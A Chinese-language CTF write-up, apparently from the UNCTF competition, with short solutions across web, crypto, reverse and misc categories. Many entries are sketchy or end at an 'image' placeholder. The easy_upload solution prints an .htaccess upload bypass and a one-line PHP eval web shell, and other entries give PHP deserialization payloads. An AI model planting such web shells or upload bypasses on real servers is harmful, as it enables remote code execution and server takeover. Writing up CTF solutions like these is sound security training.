Web

1.easy_ssrf

2.俄罗斯方块人大战奥特曼

查看源代码,发现有一个压缩包

下载下来

发现有

打开即可得到flag

image

3.easy_upload

解题过程：

上传题，测试不能上传php，phtml等，发现数据库是apache，尝试上传.htaccess文件，文件内容

<pre>AddType application/x-httpd-p
hp .jpg</pre>

上传hp.jpg

内容

<pre><?=eval($_POST[satan]);</pre>

连接蚁剑得到flag

4.easyunserialize

解题过程：

反序列化字符串逃逸，构造payload

<pre>challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;;</pre>

得出flag

5.ezphp

解题过程：

原题，构造payload

<pre>data=a:2:{s:8:"username";b:1;s:8:"password";b:1;} </pre>

得到flag

Pwn

YLBNB

使用pwntools

Reverse

recheckin

解题过程：

打开ida搜welcome，按f5

image

得到伪代码，可知与str2比较，双击跳转

双击，后面的按r转换成字符

Crypto

1.wing

image

image

image

得到flag

2.鞍山大法官

看到营养想到培根加密
将o替换位A,t替换为B
解密即可

3.easy_rsa

4.简单的RSA

得到d

5.快乐数学

第一小问找规律即可

第二小问

\sqrt[2020]{2020!}-\frac{1}{112}-\frac{28\pi}{3}

md5加密即可

Misc

1.mouse_click

下载脚本https://github.com/WangYihang/UsbMiceDataHacker，下载后放到wireshark根目录，附件也放进去，管理员运行cmd，cd到wireshark根目录，输入

<pre>python2 UsbMiceDataHacker.py mouse_click.pcapng LEFT</pre>

然后就自动绘制出了鼠标运行轨迹

image

得出flag

2.倒影

010editor打开文件，底部有一串base64字符，解码后得到一串hex码，但是得不出东西，根据题目名称提示，将hex码倒序输出，再使用010editor生成文件得出压缩包，有密码，爆破六位数密码后得出flag

3.你能破解我的密码吗

image

后面接了md5，根据shadow文件格式，md5解密结果123456即密码.

4.阴阳人编码

image

5.EZIMAGE

使用imgmagick里面的montage拼图
<pre>montage unctf.png -tile 1515 -geometry +0+0 flag.png</pre>
然后得到这个

6.零

打开txt，是一段字母，尝试词频分析没有用，全选复制到wps，发现有多处留白，百度得知是零宽度字符串隐写，http://330k.github.io/misc_tools/unicode_steganography.html
进入这个网站，解密得到flag

image

7.网络深处1

解题过程：解压文件，有一段拨号音，不知道要干什么，尝试解压里面的压缩包，发现要密码，猜测电话号码就是密码，11位数字密码爆破

image

8.baba_is_you

有一个b站地址
flag在评论区

9.撕毁的二维码

10.被删除的flag

放BT5里
cat flag

直接得到flag

11.爷的历险记

解摩丝码
拿到屠龙刀

打了第一个boss

购买hint2
修改hint2提示的那个文件

12.躲猫猫

后缀改成zip解压， 打开/xl/sharedstring.xml

image

13.YLB's CAPTCHA - 签到题

阴间签到，验证码纯眼看，连对十次就可以得到flag了。